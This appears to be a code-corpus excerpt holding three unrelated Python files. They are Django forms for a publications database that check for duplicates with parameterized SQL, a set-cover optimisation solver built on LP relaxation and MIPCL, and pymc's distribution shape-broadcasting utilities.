cursor.execute('SELECT `id` ' +
'FROM `institute` ' +
'WHERE `name`=%s', [cleaned_data['name'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('name', 'Institute field with same name exists.')
return self.cleaned_data
class AddDepartmentForm(forms.Form):
name = forms.CharField(
label='Department Name',
help_text='Enter the name of the department here.',
min_length=1
)
def clean(self):
cleaned_data = super(AddDepartmentForm, self).clean()
text_fields = {
'name': cleaned_data.get('name'),
}
for f in text_fields.keys():
if f in cleaned_data and any(char.isdigit() for char in text_fields[f]):
self.add_error(f, 'Field %s cannot contain numbers.' % f)
if 'name' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `department` ' +
'WHERE `name`=%s', [cleaned_data['name'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('name', 'Department with same name exists.')
return self.cleaned_data
class AddFieldForm(forms.Form):
name = forms.CharField(
label='Field Name',
help_text='Enter the name of the field here.',
min_length=1
)
department1 = forms.ChoiceField(
label='Department(s)',
help_text='Choose the department(s) the field belongs to. ' +
'If a department does not exist. Add one from the menu.',
choices=[]
)
def __init__(self, *args, **kwargs):
super(AddFieldForm, self).__init__(*args, **kwargs)
with connection.cursor() as cursor:
cursor.execute('SELECT `id`, `name` FROM `department`;')
tbl = cursor.fetchall()
dept_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
self.fields['department1'].choices = dept_choices
def clean(self):
cleaned_data = super(AddFieldForm, self).clean()
text_fields = {
'name': cleaned_data.get('name'),
}
for f in text_fields.keys():
if f in cleaned_data and any(char.isdigit() for char in text_fields[f]):
self.add_error(f, 'Field %s cannot contain numbers.' % f)
if 'name' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `publication_field` ' +
'WHERE `title`=%s', [cleaned_data['name'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('name', 'Publication field with same name exists.')
i = 0
while True:
if not 'department%d' % (i + 1) in cleaned_data:
break
i += 1
for j in range(0, i):
for k in range(j + 1, i):
if cleaned_data['department%d' % (j + 1)] == cleaned_data['department%d' % (k + 1)]:
self.add_error('department%d' % (j + 1), 'Two department fields cannot be same')
self.add_error('department%d' % (k + 1), 'Two department fields cannot be same')
return self.cleaned_data
class AddAuthorForm(forms.Form):
first_name = forms.CharField(
label='First Name',
strip=True,
min_length=1,
help_text='Enter the author\'s first name.',
)
middle_name = forms.CharField(
label='Middle Name',
strip=True,
required=False,
help_text='Enter the author\'s middle name.',
)
last_name = forms.CharField(
label='Last Name',
strip=True,
min_length=1,
help_text='Enter the author\'s last name.',
)
email = forms.EmailField(
label='Email',
help_text='Enter the author\'s Email here.'
)
url = forms.URLField(
label='Author URL',
widget=forms.URLInput,
help_text='Enter a homepage URL for the author.',
required=False
)
type = forms.ChoiceField(
label='Author Type',
widget=forms.RadioSelect,
choices=[
('Student', 'Student'),
('Faculty', 'Faculty'),
],
help_text='Select the kind of author (Student/Faculty).',
)
institute = forms.ChoiceField(
label='Institute',
choices=[],
help_text='Choose the author\'s institute from the list. ' +
'If your institute does not exist, add one from the menu.'
)
department = forms.ChoiceField(
label='Department',
choices=[],
help_text='Choose the author\'s department from the list. ' +
'If your department does not exist, add one from the menu.'
)
def __init__(self, *args, **kwargs):
super(AddAuthorForm, self).__init__(*args, **kwargs)
with connection.cursor() as cursor:
cursor.execute('SELECT `id`, `name` FROM `department`;')
tbl = cursor.fetchall()
dept_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
cursor.execute('SELECT `id`, `name` FROM `institute`;')
tbl = cursor.fetchall()
inst_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
self.fields['institute'].choices = inst_choices
self.fields['department'].choices = dept_choices
def clean(self):
"""
Validate form data.
"""
cleaned_data = super(AddAuthorForm, self).clean()
typ = cleaned_data.get('type')
if 'first_name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('first_name')):
self.add_error('first_name', 'Name cannot contain numbers.')
if 'middle_name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('middle_name')):
self.add_error('middle_name', 'Name cannot contain numbers.')
if 'last_name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('last_name')):
self.add_error('last_name', 'Name cannot contain numbers.')
if 'type' in cleaned_data and typ != 'Student' and typ != 'Faculty':
self.add_error('type', 'Invalid value for type.')
if 'email' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `author` ' +
'WHERE `email`=%s', [cleaned_data['email'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('email', 'Author with same Email exists.')
return self.cleaned_data
class AddPublisherForm(forms.Form):
name = forms.CharField(
label='Publisher Name',
strip=True,
min_length=1,
help_text='Enter the publisher\'s name.',
)
url = forms.URLField(
label='Publisher URL',
widget=forms.URLInput,
help_text='Enter a homepage URL for the publisher.',
)
type = forms.ChoiceField(
label='Publisher Type',
widget=forms.RadioSelect,
choices=[
('Journal', 'Journal'),
('Conference', 'Conference'),
('Publishing House', 'Publishing House'),
],
help_text='Select the kind of publisher.',
)
def clean(self):
"""
Validate form data.
"""
cleaned_data = super(AddPublisherForm, self).clean()
typ = cleaned_data.get('type')
if 'name' in cleaned_data and any(char.isdigit() for char in cleaned_data.get('name')):
self.add_error('first_name', 'Name cannot contain numbers.')
if 'type' in cleaned_data and typ != 'Conference' and typ != 'Journal' and typ != 'Publishing House':
self.add_error('type', 'Invalid value for type.')
if 'url' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `publisher` ' +
'WHERE `url`=%s', [cleaned_data['url'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('url', 'Publisher with same URL exists.')
return self.cleaned_data
class AddPublicationForm(forms.Form):
title = forms.CharField(
label='Title',
help_text='The title of the publication.',
min_length=1
)
description = forms.CharField(
label='Description',
required=False,
widget=forms.Textarea,
help_text='A brief abstract of your publication.'
)
url = forms.URLField(
label='URL',
help_text='A URL for your publication.',
required=False,
)
location = forms.CharField(
label='Location',
required=False,
help_text='Enter a location for your publication, it can be the location ' +
'of the conference or that of the publisher.'
)
date = forms.DateField(
label='Date of Publication',
help_text='Date your publication was published. The format is "DD/MM/YYYY".',
input_formats=['%d/%m/%Y', ]
)
code = forms.CharField(
label='Publication Code',
required=False,
help_text='ISBN or similar code for the publication.'
)
publisher = forms.ChoiceField(
label='Publisher',
help_text='Choose the publisher from the list. If yours doesn\'t exist, add one from the menu.',
choices=[]
)
author1 = forms.ChoiceField(
label='Author(s)',
help_text='Choose the author from the list. If yours does not exist, add one from the menu.',
choices=[]
)
degree1 = forms.ChoiceField(
label='Degree',
help_text='The degree/status of author',
choices=[
('first', 'First'),
('second', 'Second'),
('third', 'Third'),
('corresponding', 'Corresponding'),
('other', 'Other')
]
)
field1 = forms.ChoiceField(
label='Field(s)/Area(s)',
help_text='Choose the field(s) your publication belongs to. If yours does not exist, add one from the menu.',
choices=[]
)
def __init__(self, *args, **kwargs):
super(AddPublicationForm, self).__init__(*args, **kwargs)
with connection.cursor() as cursor:
cursor.execute('SELECT `id`, `title` FROM `publication_field`;')
tbl = cursor.fetchall()
field_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
cursor.execute('SELECT `id`, `first_name`, `last_name` FROM `author`;')
tbl = cursor.fetchall()
author_choices = list(map(
lambda row: (row[0], row[1] + ' ' + row[2]),
tbl
))
cursor.execute('SELECT `id`, `name` FROM `publisher`;')
tbl = cursor.fetchall()
publ_choices = list(map(
lambda row: (row[0], row[1]),
tbl
))
self.fields['publisher'].choices = publ_choices
self.fields['field1'].choices = field_choices
self.fields['author1'].choices = author_choices
def clean(self):
cleaned_data = copy.deepcopy(super(AddPublicationForm, self).clean())
if 'url' in cleaned_data:
with connection.cursor() as cursor:
cursor.execute('SELECT `id` ' +
'FROM `publication` ' +
'WHERE `url`=%s', [cleaned_data['url'], ])
row = cursor.fetchone()
if row is not None and row[0]:
self.add_error('url', 'Publication with same URL exists.')
i = 0
while True:
if not 'author%d' % (i + 1) in cleaned_data:
break
i += 1
for j in range(0, i):
for k in range(j + 1, i):
if cleaned_data['author%d' % (j + 1)] == cleaned_data['author%d' % (k + 1)]:
self.add_error('author%d' % (j + 1), 'Two author fields cannot be same')
self.add_error('author%d' % (k + 1), 'Two author fields cannot be same')
i = 0
while True:
if not 'field%d' % (i + 1) in cleaned_data:
break
i += 1
for j in range(0, i):
for k in range(j + 1, i):
if cleaned_data['field%d' % (j + 1)] == cleaned_data['field%d' % (k + 1)]:
self.add_error('field%d' % (j + 1), 'Two fields cannot be same')
self.add_error('field%d' % (k + 1), 'Two fields cannot be same')
return self.cleaned_data
``` |
{
"source": "5hun/discrete-optimization-setcover",
"score": 3
} |
#### File: 5hun/discrete-optimization-setcover/solver.py
```python
from collections import defaultdict
import itertools as it
import numpy as np
import sys
sys.path.append(r"C:\Program Files\PNN\MIPCL-PY_64")
import mipcl_py.mipshell.mipshell as mp
from ortools.linear_solver import pywraplp
class Problem:
def __init__(self, text):
lines = [tuple(map(int, l.split())) for l in text.split("\n")]
self.n, self.m = lines[0]
self.cost = np.array([x[0] for x in lines[1:] if len(x)], dtype=np.int)
self.sets = tuple(
frozenset(x[1:])
for x in lines[1:] if len(x)
)
def is_feasible(self, sol):
"""Check if the solution is feasible or not"""
assert(len(sol) == self.m)
flg = np.zeros(self.n, dtype=np.bool)
for i, v in enumerate(sol):
if v:
for j in self.sets[i]:
flg[j] = True
return np.all(flg)
def objective(self, sol):
"""Calculate objective value of sol"""
obj = 0
for i, v in enumerate(sol):
if v:
obj += self.cost[i]
return obj
class Reducer:
"""Reduce the size of a problem"""
def __init__(self, p):
"""
Initialization
Parameters
----------
p : Problem
"""
self.p = p
self._create_reduced_problem()
def _create_reduced_problem(self):
self.fixed = {}
self.sets = {
i: set(s)
for i, s in enumerate(self.p.sets)
}
self.e2s = defaultdict(set)
for i in self.sets:
for x in self.sets[i]:
self.e2s[x].add(i)
modified = True
while modified:
modified = False
modified = modified or self._rule2()
modified = modified or self._rule3()
modified = modified or self._rule4p()
assert len(self.fixed) == self.p.m - len(self.sets)
self.use_cols = tuple(sorted(self.sets.keys()))
self.use_rows = tuple(sorted(self.e2s.keys()))
r2i = {x: i for i, x in enumerate(self.use_rows)}
text = "%d %d\n" % (len(self.use_rows), len(self.use_cols))
text += "\n".join(
"%d " % self.p.cost[i] + " ".join(
str(r2i[x]) for x in self.sets[i]
)
for i in self.use_cols
) + "\n"
self.reduced_p = Problem(text)
def _rule2(self):
"""Remove necessary columns(sets)"""
modified = False
xs = tuple(self.e2s.keys())
for x in xs:
if x not in self.e2s:
continue
if len(self.e2s[x]) == 1:
i = self.e2s[x][0]
self.fixed[i] = 1
for y in self.sets[i]:
del self.e2s[y]
del self.sets[i]
modified = True
return modified
def _rule3(self):
"""Remove unnecessary rows(items)"""
xs = tuple(self.e2s.keys())
modified = False
for x, y in it.combinations(xs, 2):
if x not in self.e2s or y not in self.e2s:
continue
if self.e2s[x] <= self.e2s[y]:
for i in self.e2s[x]:
self.sets[i].remove(x)
del self.e2s[x]
modified = True
elif self.e2s[x] >= self.e2s[y]:
for i in self.e2s[y]:
self.sets[i].remove(y)
del self.e2s[y]
modified = True
return modified
def _rule4p(self):
"""Remove unnecessary columns(sets)"""
js = tuple(self.sets.keys())
modified = False
for i in js:
if i not in self.sets:
continue
ci = self.p.cost[i]
other = 0
for x in self.sets[i]:
other += min(self.p.cost[j] for j in self.e2s[x])
if ci > other or (len(self.sets[i]) > 1 and ci >= other):
del self.sets[i]
self.fixed[i] = 0
modified = True
return modified
def get_original_solution(self, sol):
"""create solution of original problem"""
assert len(sol) == len(self.use_cols)
ret = np.zeros(self.p.m, dtype=np.int)
for i, v in enumerate(sol):
ret[self.use_cols[i]] = v
for i in self.fixed:
ret[i] = self.fixed[i]
return ret
def get_dual_solution(p):
"""Solve the dual of linear relaxation problem and return solution"""
solver = pywraplp.Solver('dual', pywraplp.Solver.GLOP_LINEAR_PROGRAMMING)
u = [
solver.NumVar(0, solver.infinity(), "u%d" % x) for x in range(p.n)
]
for i in range(p.m):
solver.Add(sum(u[x] for x in p.sets[i]) <= float(p.cost[i]))
solver.Maximize(sum(u))
status = solver.Solve()
assert status == pywraplp.Solver.OPTIMAL
return [ux.solution_value() for ux in u]
def get_relative_cost(p, dsol):
"""
Calculate relative cost
Parameters
----------
p : Problem
dsol : np.ndarray of float
solution of the dual of linear relaxation problem
Returns
-------
rcost : np.array of float
relative cost
"""
rcost = np.array(p.cost, dtype=np.float)
for i in range(p.m):
for x in p.sets[i]:
rcost[i] -= dsol[x]
return rcost
def solve_by_mip(p, time_limit=600, silent=True, bind=None):
"""Solve by MIPCL"""
mpprob = mp.Problem("setcover")
x = [mp.Var("x(%d)" % i, type=mp.BIN) for i in range(p.m)]
mp.minimize(mp.sum_([int(p.cost[i]) * x[i] for i in range(p.m)]))
for i in range(p.n):
mp.sum_([x[j] for j in range(p.m) if i in p.sets[j]]) >= 1
if bind is not None:
for i in bind:
x[i] == bind[i]
mp.optimize(silent=silent, timeLimit=time_limit)
sol = np.zeros(p.m, dtype=np.int)
for i in range(p.m):
if x[i].val > 0.5:
sol[i] = 1
assert p.is_feasible(sol)
return sol
def solve_it(input_data):
# parse input_data and create problem
p_org = Problem(input_data)
# Reduce the size of the problem
red = Reducer(p_org)
p = red.reduced_p
# Calculate a solution of the linear relaxation problem
# and calculate relative cost
dsol = get_dual_solution(p)
rcost = get_relative_cost(p, dsol)
# Fix some columns(sets) to use
e2s = defaultdict(list)
for i in range(p.m):
for x in p.sets[i]:
e2s[x].append(i)
free_cols = set()
for x in e2s:
tmp = sorted(e2s[x], key=lambda i: p.cost[i])
for i in tmp[:1]:
free_cols.add(i)
for i in range(p.m):
if rcost[i] <= 0.01:
free_cols.add(i)
# the sets in bind are not used
bind = {i: 0 for i in range(p.m) if i not in free_cols}
# solve by mipcl
sol = solve_by_mip(p, bind=bind)
# convert to solution of original problem
sol_org = red.get_original_solution(sol)
assert(p_org.is_feasible(sol_org))
obj = p_org.objective(sol_org)
# make output text
output_data = "%d %d\n" % (obj, 0)
output_data += " ".join(map(str, sol_org))
return output_data
import sys
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
file_location = sys.argv[1].strip()
with open(file_location, 'r') as input_data_file:
input_data = input_data_file.read()
print(solve_it(input_data))
else:
print('This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/sc_6_1)')
``` |
{
"source": "5hv5hvnk/pymc",
"score": 2
} |
#### File: pymc/distributions/shape_utils.py
```python
from typing import TYPE_CHECKING, Optional, Sequence, Tuple, Union, cast
import numpy as np
from aesara.graph.basic import Variable
from aesara.tensor.var import TensorVariable
from typing_extensions import TypeAlias
from pymc.aesaraf import pandas_to_array
__all__ = [
"to_tuple",
"shapes_broadcasting",
"broadcast_dist_samples_shape",
"get_broadcastable_dist_samples",
"broadcast_distribution_samples",
"broadcast_dist_samples_to",
"rv_size_is_none",
]
def to_tuple(shape):
"""Convert ints, arrays, and Nones to tuples
Parameters
----------
shape: None, int or array-like
Represents the shape to convert to tuple.
Returns
-------
If `shape` is None, returns an empty tuple. If it's an int, (shape,) is
returned. If it is array-like, tuple(shape) is returned.
"""
if shape is None:
return tuple()
temp = np.atleast_1d(shape)
if temp.size == 0:
return tuple()
else:
return tuple(temp)
def _check_shape_type(shape):
out = []
try:
shape = np.atleast_1d(shape)
for s in shape:
if isinstance(s, np.ndarray) and s.ndim > 0:
raise TypeError(f"Value {s} is not a valid integer")
o = int(s)
if o != s:
raise TypeError(f"Value {s} is not a valid integer")
out.append(o)
except Exception:
raise TypeError(f"Supplied value {shape} does not represent a valid shape")
return tuple(out)
def shapes_broadcasting(*args, raise_exception=False):
"""Return the shape resulting from broadcasting multiple shapes.
Represents numpy's broadcasting rules.
Parameters
----------
*args: array-like of int
Tuples or arrays or lists representing the shapes of arrays to be
broadcast.
raise_exception: bool (optional)
Controls whether to raise an exception or simply return `None` if
the broadcasting fails.
Returns
-------
Resulting shape. If broadcasting is not possible and `raise_exception` is
False, then `None` is returned. If `raise_exception` is `True`, a
`ValueError` is raised.
"""
x = list(_check_shape_type(args[0])) if args else ()
for arg in args[1:]:
y = list(_check_shape_type(arg))
if len(x) < len(y):
x, y = y, x
if len(y) > 0:
x[-len(y) :] = [
j if i == 1 else i if j == 1 else i if i == j else 0
for i, j in zip(x[-len(y) :], y)
]
if not all(x):
if raise_exception:
raise ValueError(
"Supplied shapes {} do not broadcast together".format(
", ".join([f"{a}" for a in args])
)
)
else:
return None
return tuple(x)
def broadcast_dist_samples_shape(shapes, size=None):
"""Apply shape broadcasting to shape tuples but assuming that the shapes
correspond to draws from random variables, with the `size` tuple possibly
prepended to it. The `size` prepend is ignored to consider if the supplied
`shapes` can broadcast or not. It is prepended to the resulting broadcasted
`shapes`, if any of the shape tuples had the `size` prepend.
Parameters
----------
shapes: Iterable of tuples holding the distribution samples shapes
size: None, int or tuple (optional)
size of the sample set requested.
Returns
-------
tuple of the resulting shape
Examples
--------
.. code-block:: python
size = 100
shape0 = (size,)
shape1 = (size, 5)
shape2 = (size, 4, 5)
out = broadcast_dist_samples_shape([shape0, shape1, shape2],
size=size)
assert out == (size, 4, 5)
.. code-block:: python
size = 100
shape0 = (size,)
shape1 = (5,)
shape2 = (4, 5)
out = broadcast_dist_samples_shape([shape0, shape1, shape2],
size=size)
assert out == (size, 4, 5)
.. code-block:: python
size = 100
shape0 = (1,)
shape1 = (5,)
shape2 = (4, 5)
out = broadcast_dist_samples_shape([shape0, shape1, shape2],
size=size)
assert out == (4, 5)
"""
if size is None:
broadcasted_shape = shapes_broadcasting(*shapes)
if broadcasted_shape is None:
raise ValueError(
"Cannot broadcast provided shapes {} given size: {}".format(
", ".join([f"{s}" for s in shapes]), size
)
)
return broadcasted_shape
shapes = [_check_shape_type(s) for s in shapes]
_size = to_tuple(size)
# samples shapes without the size prepend
sp_shapes = [s[len(_size) :] if _size == s[: min([len(_size), len(s)])] else s for s in shapes]
try:
broadcast_shape = shapes_broadcasting(*sp_shapes, raise_exception=True)
except ValueError:
raise ValueError(
"Cannot broadcast provided shapes {} given size: {}".format(
", ".join([f"{s}" for s in shapes]), size
)
)
broadcastable_shapes = []
for shape, sp_shape in zip(shapes, sp_shapes):
if _size == shape[: len(_size)]:
# If size prepends the shape, then we have to add broadcasting axis
# in the middle
p_shape = (
shape[: len(_size)]
+ (1,) * (len(broadcast_shape) - len(sp_shape))
+ shape[len(_size) :]
)
else:
p_shape = shape
broadcastable_shapes.append(p_shape)
return shapes_broadcasting(*broadcastable_shapes, raise_exception=True)
def get_broadcastable_dist_samples(
samples, size=None, must_bcast_with=None, return_out_shape=False
):
"""Get a view of the samples drawn from distributions which adds new axises
in between the `size` prepend and the distribution's `shape`. These views
should be able to broadcast the samples from the distrubtions taking into
account the `size` (i.e. the number of samples) of the draw, which is
prepended to the sample's `shape`. Optionally, one can supply an extra
`must_bcast_with` to try to force samples to be able to broadcast with a
given shape. A `ValueError` is raised if it is not possible to broadcast
the provided samples.
Parameters
----------
samples: Iterable of ndarrays holding the sampled values
size: None, int or tuple (optional)
size of the sample set requested.
must_bcast_with: None, int or tuple (optional)
Tuple shape to which the samples must be able to broadcast
return_out_shape: bool (optional)
If `True`, this function also returns the output's shape and not only
samples views.
Returns
-------
broadcastable_samples: List of the broadcasted sample arrays
broadcast_shape: If `return_out_shape` is `True`, the resulting broadcast
shape is returned.
Examples
--------
.. code-block:: python
must_bcast_with = (3, 1, 5)
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(size, 5)
sample2 = np.random.randn(size, 4, 5)
out = broadcast_dist_samples_to(
[sample0, sample1, sample2],
size=size,
must_bcast_with=must_bcast_with,
)
assert out[0].shape == (size, 1, 1, 1)
assert out[1].shape == (size, 1, 1, 5)
assert out[2].shape == (size, 1, 4, 5)
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1[:, None, None] == out[1])
assert np.all(sample2[:, None] == out[2])
.. code-block:: python
size = 100
must_bcast_with = (3, 1, 5)
sample0 = np.random.randn(size)
sample1 = np.random.randn(5)
sample2 = np.random.randn(4, 5)
out = broadcast_dist_samples_to(
[sample0, sample1, sample2],
size=size,
must_bcast_with=must_bcast_with,
)
assert out[0].shape == (size, 1, 1, 1)
assert out[1].shape == (5,)
assert out[2].shape == (4, 5)
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1 == out[1])
assert np.all(sample2 == out[2])
"""
samples = [np.asarray(p) for p in samples]
_size = to_tuple(size)
must_bcast_with = to_tuple(must_bcast_with)
# Raw samples shapes
p_shapes = [p.shape for p in samples] + [_check_shape_type(must_bcast_with)]
out_shape = broadcast_dist_samples_shape(p_shapes, size=size)
# samples shapes without the size prepend
sp_shapes = [
s[len(_size) :] if _size == s[: min([len(_size), len(s)])] else s for s in p_shapes
]
broadcast_shape = shapes_broadcasting(*sp_shapes, raise_exception=True)
broadcastable_samples = []
for param, p_shape, sp_shape in zip(samples, p_shapes, sp_shapes):
if _size == p_shape[: min([len(_size), len(p_shape)])]:
# If size prepends the shape, then we have to add broadcasting axis
# in the middle
slicer_head = [slice(None)] * len(_size)
slicer_tail = [np.newaxis] * (len(broadcast_shape) - len(sp_shape)) + [
slice(None)
] * len(sp_shape)
else:
# If size does not prepend the shape, then we have leave the
# parameter as is
slicer_head = []
slicer_tail = [slice(None)] * len(sp_shape)
broadcastable_samples.append(param[tuple(slicer_head + slicer_tail)])
if return_out_shape:
return broadcastable_samples, out_shape
else:
return broadcastable_samples
def broadcast_distribution_samples(samples, size=None):
"""Broadcast samples drawn from distributions taking into account the
size (i.e. the number of samples) of the draw, which is prepended to
the sample's shape.
Parameters
----------
samples: Iterable of ndarrays holding the sampled values
size: None, int or tuple (optional)
size of the sample set requested.
Returns
-------
List of broadcasted sample arrays
Examples
--------
.. code-block:: python
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(size, 5)
sample2 = np.random.randn(size, 4, 5)
out = broadcast_distribution_samples([sample0, sample1, sample2],
size=size)
assert all((o.shape == (size, 4, 5) for o in out))
assert np.all(sample0[:, None, None] == out[0])
assert np.all(sample1[:, None, :] == out[1])
assert np.all(sample2 == out[2])
.. code-block:: python
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(5)
sample2 = np.random.randn(4, 5)
out = broadcast_distribution_samples([sample0, sample1, sample2],
size=size)
assert all((o.shape == (size, 4, 5) for o in out))
assert np.all(sample0[:, None, None] == out[0])
assert np.all(sample1 == out[1])
assert np.all(sample2 == out[2])
"""
return np.broadcast_arrays(*get_broadcastable_dist_samples(samples, size=size))
def broadcast_dist_samples_to(to_shape, samples, size=None):
"""Broadcast samples drawn from distributions to a given shape, taking into
account the size (i.e. the number of samples) of the draw, which is
prepended to the sample's shape.
Parameters
----------
to_shape: Tuple shape onto which the samples must be able to broadcast
samples: Iterable of ndarrays holding the sampled values
size: None, int or tuple (optional)
size of the sample set requested.
Returns
-------
List of the broadcasted sample arrays
Examples
--------
.. code-block:: python
to_shape = (3, 1, 5)
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(size, 5)
sample2 = np.random.randn(size, 4, 5)
out = broadcast_dist_samples_to(
to_shape,
[sample0, sample1, sample2],
size=size
)
assert np.all((o.shape == (size, 3, 4, 5) for o in out))
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1[:, None, None] == out[1])
assert np.all(sample2[:, None] == out[2])
.. code-block:: python
size = 100
to_shape = (3, 1, 5)
sample0 = np.random.randn(size)
sample1 = np.random.randn(5)
sample2 = np.random.randn(4, 5)
out = broadcast_dist_samples_to(
to_shape,
[sample0, sample1, sample2],
size=size
)
assert np.all((o.shape == (size, 3, 4, 5) for o in out))
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1 == out[1])
assert np.all(sample2 == out[2])
"""
samples, to_shape = get_broadcastable_dist_samples(
samples, size=size, must_bcast_with=to_shape, return_out_shape=True
)
return [np.broadcast_to(o, to_shape) for o in samples]
# Workaround to annotate the Ellipsis type, posted by the BDFL himself.
# See https://github.com/python/typing/issues/684#issuecomment-548203158
if TYPE_CHECKING:
from enum import Enum
class ellipsis(Enum):
Ellipsis = "..."
Ellipsis = ellipsis.Ellipsis
else:
ellipsis = type(Ellipsis)
# User-provided can be lazily specified as scalars
Shape: TypeAlias = Union[int, TensorVariable, Sequence[Union[int, Variable, ellipsis]]]
Dims: TypeAlias = Union[str, Sequence[Optional[Union[str, ellipsis]]]]
Size: TypeAlias = Union[int, TensorVariable, Sequence[Union[int, Variable]]]
# After conversion to vectors
WeakShape: TypeAlias = Union[TensorVariable, Tuple[Union[int, Variable, ellipsis], ...]]
WeakDims: TypeAlias = Tuple[Optional[Union[str, ellipsis]], ...]
# After Ellipsis were substituted
StrongShape: TypeAlias = Union[TensorVariable, Tuple[Union[int, Variable], ...]]
StrongDims: TypeAlias = Sequence[Optional[str]]
StrongSize: TypeAlias = Union[TensorVariable, Tuple[Union[int, Variable], ...]]
def convert_dims(dims: Optional[Dims]) -> Optional[WeakDims]:
"""Process a user-provided dims variable into None or a valid dims tuple."""
if dims is None:
return None
if isinstance(dims, str):
dims = (dims,)
elif isinstance(dims, (list, tuple)):
dims = tuple(dims)
else:
raise ValueError(f"The `dims` parameter must be a tuple, str or list. Actual: {type(dims)}")
if any(d == Ellipsis for d in dims[:-1]):
raise ValueError(f"Ellipsis in `dims` may only appear in the last position. Actual: {dims}")
return dims
def convert_shape(shape: Shape) -> Optional[WeakShape]:
"""Process a user-provided shape variable into None or a valid shape object."""
if shape is None:
return None
elif isinstance(shape, int) or (isinstance(shape, TensorVariable) and shape.ndim == 0):
shape = (shape,)
elif isinstance(shape, TensorVariable) and shape.ndim == 1:
shape = tuple(shape)
elif isinstance(shape, (list, tuple)):
shape = tuple(shape)
else:
raise ValueError(
f"The `shape` parameter must be a tuple, TensorVariable, int or list. Actual: {type(shape)}"
)
if isinstance(shape, tuple) and any(s == Ellipsis for s in shape[:-1]):
raise ValueError(
f"Ellipsis in `shape` may only appear in the last position. Actual: {shape}"
)
return shape
def convert_size(size: Size) -> Optional[StrongSize]:
"""Process a user-provided size variable into None or a valid size object."""
if size is None:
return None
elif isinstance(size, int) or (isinstance(size, TensorVariable) and size.ndim == 0):
size = (size,)
elif isinstance(size, TensorVariable) and size.ndim == 1:
size = tuple(size)
elif isinstance(size, (list, tuple)):
size = tuple(size)
else:
raise ValueError(
f"The `size` parameter must be a tuple, TensorVariable, int or list. Actual: {type(size)}"
)
if isinstance(size, tuple) and Ellipsis in size:
raise ValueError(f"The `size` parameter cannot contain an Ellipsis. Actual: {size}")
return size
def resize_from_dims(dims: WeakDims, ndim_implied: int, model) -> Tuple[StrongSize, StrongDims]:
"""Determines a potential resize shape from a `dims` tuple.
Parameters
----------
dims : array-like
A vector of dimension names, None or Ellipsis.
ndim_implied : int
Number of RV dimensions that were implied from its inputs alone.
model : pm.Model
The current model on stack.
Returns
-------
resize_shape : array-like
Shape of new dimensions that should be prepended.
dims : tuple of (str or None)
Names or None for all dimensions after resizing.
"""
if Ellipsis in dims:
# Auto-complete the dims tuple to the full length.
# We don't have a way to know the names of implied
# dimensions, so they will be `None`.
dims = (*dims[:-1], *[None] * ndim_implied)
sdims = cast(StrongDims, dims)
ndim_resize = len(sdims) - ndim_implied
# All resize dims must be known already (numerically or symbolically).
unknowndim_resize_dims = set(sdims[:ndim_resize]) - set(model.dim_lengths)
if unknowndim_resize_dims:
raise KeyError(
f"Dimensions {unknowndim_resize_dims} are unknown to the model and cannot be used to specify a `size`."
)
# The numeric/symbolic resize tuple can be created using model.RV_dim_lengths
resize_shape: Tuple[Variable, ...] = tuple(
model.dim_lengths[dname] for dname in sdims[:ndim_resize]
)
return resize_shape, sdims
def resize_from_observed(
observed, ndim_implied: int
) -> Tuple[StrongSize, Union[np.ndarray, Variable]]:
"""Determines a potential resize shape from observations.
Parameters
----------
observed : scalar, array-like
The value of the `observed` kwarg to the RV creation.
ndim_implied : int
Number of RV dimensions that were implied from its inputs alone.
Returns
-------
resize_shape : array-like
Shape of new dimensions that should be prepended.
observed : scalar, array-like
Observations as numpy array or `Variable`.
"""
if not hasattr(observed, "shape"):
observed = pandas_to_array(observed)
ndim_resize = observed.ndim - ndim_implied
resize_shape = tuple(observed.shape[d] for d in range(ndim_resize))
return resize_shape, observed
def find_size(
shape: Optional[WeakShape],
size: Optional[StrongSize],
ndim_supp: int,
) -> Tuple[Optional[StrongSize], Optional[int], Optional[int], int]:
"""Determines the size keyword argument for creating a Distribution.
Parameters
----------
shape
A tuple specifying the final shape of a distribution
size
A tuple specifying the size of a distribution
ndim_supp : int
The support dimension of the distribution.
0 if a univariate distribution, 1 or higher for multivariate distributions.
Returns
-------
create_size : int, optional
The size argument to be passed to the distribution
ndim_expected : int, optional
Number of dimensions expected after distribution was created
ndim_batch : int, optional
Number of batch dimensions
ndim_supp : int
Number of support dimensions
"""
ndim_expected: Optional[int] = None
ndim_batch: Optional[int] = None
create_size: Optional[StrongSize] = None
if shape is not None:
if Ellipsis in shape:
# Ellipsis short-hands all implied dimensions. Therefore
# we don't know how many dimensions to expect.
ndim_expected = ndim_batch = None
# Create the RV with its implied shape and resize later
create_size = None
else:
ndim_expected = len(tuple(shape))
ndim_batch = ndim_expected - ndim_supp
create_size = tuple(shape)[:ndim_batch]
elif size is not None:
ndim_expected = ndim_supp + len(tuple(size))
ndim_batch = ndim_expected - ndim_supp
create_size = size
return create_size, ndim_expected, ndim_batch, ndim_supp
def rv_size_is_none(size: Variable) -> bool:
"""Check wether an rv size is None (ie., at.Constant([]))"""
